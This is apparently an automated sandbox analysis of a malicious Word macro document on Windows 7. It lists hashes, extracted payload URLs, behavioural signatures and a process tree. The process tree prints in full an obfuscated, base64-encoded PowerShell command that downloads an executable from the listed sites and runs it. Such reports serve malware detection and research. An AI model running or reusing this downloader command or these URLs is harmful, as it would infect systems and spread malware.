Analysis
-
max time kernel
121s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
17-09-2024 10:57
Behavioral task
behavioral1
Sample
e6ab9a446b83f844455158ae671c1977_JaffaCakes118.doc
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e6ab9a446b83f844455158ae671c1977_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e6ab9a446b83f844455158ae671c1977_JaffaCakes118.doc
-
Size
183KB
-
MD5
e6ab9a446b83f844455158ae671c1977
-
SHA1
8d871c28578b49a13304ee9a3d6490425e30a91e
-
SHA256
6da70e0246338ef86cc0dd0e60504127ec28ccf40607ae2c3b78d62c6a91ea5c
-
SHA512
e04084b56726fa10a286ce6fbe9b91f654d72d886c4ad85da5e604e1729ffb2c0ea5b9ac80aad92002949ff03674bb00583b272d0c1142e51846958f023f59b9
-
SSDEEP
3072:s77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qPVxuXKc29HzPBx4Pr1yL+xLtNX:s77HUUUUUUUUUUUUUUUUUUUT52VWcXKq
Malware Config
Extracted
http://alpinaemlak.com/wp-contents/5SZUz/
http://celebration-studio.com/wp-admin/Z0Gik/
http://absimpex.com/images/9KOW/
http://jaspinformatica.com/boxcloud/aX/
https://inovatips.com/9yorcan/Y1io/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2804 2244 PoWeRsHelL.exe 31 -
Blocklisted process makes network request 3 IoCs
flow pid Process 7 2804 PoWeRsHelL.exe 9 2804 PoWeRsHelL.exe 11 2804 PoWeRsHelL.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk PoWeRsHelL.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLReset" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074}\ = "IReturnString" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF}\ = "IControl" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSelect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9C19CFAF-1291-4F79-9B85-689241C8B3CC}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{9C19CFAF-1291-4F79-9B85-689241C8B3CC}\2.0\0 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F}\ = "CommandButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69}\ = "IDataAutoWrapper" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB}\ = "Font" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC1-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9C19CFAF-1291-4F79-9B85-689241C8B3CC}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLSubmitButton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\TypeLib\{9C19CFAF-1291-4F79-9B85-689241C8B3CC}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{9C19CFAF-1291-4F79-9B85-689241C8B3CC}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\VBE" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-1506706701-1246725540-2219210854-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2520 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2804 PoWeRsHelL.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2804 PoWeRsHelL.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2520 WINWORD.EXE 2520 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2520 wrote to memory of 1620 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 1620 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 1620 2520 WINWORD.EXE 30 PID 2520 wrote to memory of 1620 2520 WINWORD.EXE 30
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e6ab9a446b83f844455158ae671c1977_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2520 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1620
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\PoWeRsHelL.exePoWeRsHelL -e JABpAEEAYwBvAF8AeABVAD0AKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACAAJwBEAEEAJwAsACcAdwA0AEEAJwAsACcAQQBDAHcAJwApADsAJABCAEEAQQAxAHgAQQAgAD0AIAAnADQANAAxACcAOwAkAEUAQQBvAEIAYwBBAEEAPQAoACIAewAwAH0AewAxAH0AewAyAH0AIgAtAGYAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcAaQAnACwAKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAJwBRACcALAAnAEQAQwAxACcAKQApACwAJwBCACcALAAnAGsAYwAnACkAOwAkAEwAUQBCAEEARwBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABCAEEAQQAxAHgAQQArACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHgAZQAnACwAJwAuAGUAJwApADsAJABMAEEAbwBVAFUAQQBBAD0AKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnADEAQgAnACwAJwBCAEEAQQAnACwAJwBmAG8AQQAnACkAOwAkAG4AWgBBAHgAQQBEAEEAPQAmACgAJwBuACcAKwAnAGUAdwAtACcAKwAnAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAE4ARQBUAC4AYAB3AGUAQgBgAGMATABgAEkAZQBgAE4AdAA7ACQAYwBVAFEAQQBDAEEAUQA9ACgAIgB7ADMANwB9AHsAMwA0AH0AewAwAH0AewAzADMAfQB7ADkAfQB7ADIAOAB9AHsANAAwAH0AewA0ADMAfQB7ADEANQB9AHsANQB9AHsAMQB9AHsANAB9AHsAMwA1AH0AewAzADYAfQB7ADEANAB9AHsANgB9AHsANwB9AHsAMgA0AH0AewAzADEAfQB7ADEAMgB9AHsAMwA4AH0AewAyADYAfQB7ADEAOAB9AHsAMgA3AH0AewAzAH0AewA0ADIAfQB7ADMAMAB9AHsAMQA5AH0AewAzADkAfQB7ADIAMgB9AHsAOAB9AHsANAAxAH0AewAyADEAfQB7ADEANgB9AHsAMgB9AHsAMQAwAH0AewAxADEAfQB7ADIAOQB9AHsAMgAwAH0AewAxADMAfQB7ADIAMwB9AHsAMQA3AH0AewAzADIAfQB7ADIANQB9ACIALQBmACAAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBwACcALAAnAGkAbgBhACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAbwAuACcALAAnAGMAbwBtACcAKQAsACcAYQAnACwAKAAiAHsAMgB9AHsAMAB9AHsAMQB9ACIAIAAtAGYAIAAnAC8AJwAsACcAOQAnACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBpAG0AYQBnACcALAAnAGUAcwAnACkAKQAsACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACcAcAAtACcALAAnAC8AdwAnACkALAAnAHUAZABpACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBaADAARwAnACwAJwBpACcAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAGsALwAnACwAJwBAAGgAJwApACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwBpAGMAYQAnACwAJwAuACcAKQAsACcAYQBrACcALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBYAC8AJwAsACcAQABoACcAKQAsACcAdAAnACwAJwBhACcALAAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAgACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAC8AJwAsACcAaQBuAG8AdgAnACkALAAnAGEAdAAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAG4ALwAnACwAJwBtAGkAJwApACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAnAHQAaQBvACcALAAnAGUAYgByAGEAJwApACwAJwAtAHMAdAAnACwAJwBuACcAKQAsACcAZAAvACcALAAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AIgAtAGYAIAAnADkAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACcAYwAnACwAJwBvAG0ALwAnACkALAAnAHAAcwAuACcALAAnAHkAbwAnACkALAAnAG0AJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAYQBzACcALAAnAHAAaQAnACkALAAoACIAewAwAH0AewAxAH0AIgAtAGYAJwBwACcALAAnAHMAOgAvACcAKQAsACcAbwB1ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBhAHQAJwAsACcAcgBtACcAKQAsACcAaQAnACwAJwB0ACcALAAoACIAewAxAH0AewAwAH0AIgAtAGYAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAGkAbwAvACcALAAnADEAJwApACwAJwBZACcAKQAsACcALgBjAG8AJwAsACcALwAnACwAJwAuAGMAJwAsACcAdAAnACwAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIAIAAtAGYAIAAnAHQAJwAsACcAagAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAC8ALwAnACwAJwB0AHAAOgAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAnAHQAcAAnACwAJwA6AC8ALwAnACkALAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAnAGEAbgAvACcALAAnAHIAYwAnACkALAAnAGUAbQBsACcALAAnAGEAbAAnACwAJwBhACcALAAnAGQAJwAsACgAIgB7ADAAfQB7ADEAfQAiAC0AZgAgACcAaAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwB0AHQAcAA6ACcALAAnAC8ALwAnACkAKQAsACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiACAALQBmACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBiAHMAaQAnACwAJwBtACcAKQAsACcAcAAnACwAJwBlAHgAJwApACwAJwBuAGYAbwAnACwAKAAiAHsAMwB9AHsAMQB9AHsAMgB9AHsANAB9AHsAMAB9ACIAIAAtAGYAJwA6ACcALAAnADUAUwBaACcALAAnAFUAegAvACcALAAoACIAewAxAH0AewAzAH0AewAwAH0AewAyAH0AIgAgAC0AZgAgACcAdwBwAC0AYwBvAG4AJwAsACcAbwAnACwAJwB0AGUAbgB0AHMALwAnACwAJwBtAC8AJwApACwAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBAACcALAAnAGgAdAB0AHAAJwApACkALAAoACIAewAzAH0AewAwAH0AewAyAH0AewAxAH0AIgAtAGYAIAAnAGIAbwAnACwAJwBsACcALAAnAHgAYwAnACwAKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAIAAnAG0ALwAnACwAJwBjAG8AJwApACkALAAoACIAewAxAH0AewAwAH0AewAyAH0AIgAtAGYAIAAnAE8AVwAnACwAJwBLACcALAAnAC8AQABoACcAKQAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAbAAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACcALwAvACcALAAnAGMAZQAnACkAKQApAC4AIgBTAGAAcABMAEkAVAAiACgAJwBAACcAKQA7ACQAdQBCAEQANAB4AEEAPQAoACIAewAxAH0AewAyAH0AewAwAH0AIgAtAGYAIAAnAG8AJwAsACcAYwAnACwAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAJwA0AEEAJwAsACcANABDAEEAJwApACkAOwBmAG8AcgBlAGEAYwBoACgAJABBAHgAQQBaAEEAQwAgAGkAbgAgACQAYwBVAFEAQQBDAEEAUQApAHsAdAByAHkAewAkAG4AWgBBAHgAQQBEAEEALgAiAEQAYABvAHcAbgBgAGwAbwBgAEEAZABGAGkATABlACIAKAAkAEEAeABBAFoAQQBDACwAIAAkAEwAUQBCAEEARwBvACkAOwAkAEsAawBBAEIAdwBEAEEAPQAoACIAewAwAH0AewAxAH0AIgAgAC0AZgAnAGoAJwAsACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBRAEEAJwAsACcAeABfAGMAJwApACkAOwBJAGYAIAAoACgAJgAoACcARwAnACsAJwBlAHQAJwArACcALQBJAHQAZQBtACcAKQAgACQATABRAEIAQQBHAG8AKQAuACIATABgAGUATgBnAHQAaAAiACAALQBnAGUAIAAyADcAMgA4ADIAKQAgAHsAJgAoACcASQBuAHYAbwBrACcAKwAnAGUALQAnACsAJwBJAHQAZQBtACcAKQAgACQATABRAEIAQQBHAG8AOwAkAHoAawBBAG8AQQBCAD0AKAAiAHsAMQB9AHsAMAB9ACIAIAAtAGYAJwBBAEcAJwAsACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACcAQQBjAEEAJwAsACcATAAnACkAKQA7AGIAcgBlAGEAawA7ACQARQBVADQAUQBHAF8AQwBrAD0AKAAiAHsAMQB9AHsAMAB9ACIALQBmACAAKAAiAHsAMAB9AHsAMgB9AHsAMQB9ACIALQBmACcANAAnACwAJwBBAEQAJwAsACcAWgBrAEEAJwApACwAJwBTACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcQBjAEEAVQBBAEMAeABvAD0AKAAiAHsAMAB9AHsAMQB9AHsAMgB9ACIALQBmACAAJwBKAG8AJwAsACcAQgBEAFgAJwAsACcARAAxACcAKQA=1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2804
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD5bf64cc3571006ce61fc8278705a6174f
SHA1da653c378819d9125ce6753c48991086dd5ee48a
SHA256cd198437b1340fa630b04cc0540ec1027f80cf02c425b5acda029952961c03eb
SHA512828273b89a10ac8904b9b2ec8e4d94c1d0b2281dfb558440b33058f6ec7d9ae23cad84d8789bdaa0c198aca772a5f16ee226a49bb6e0abc20aaddf31f8eca065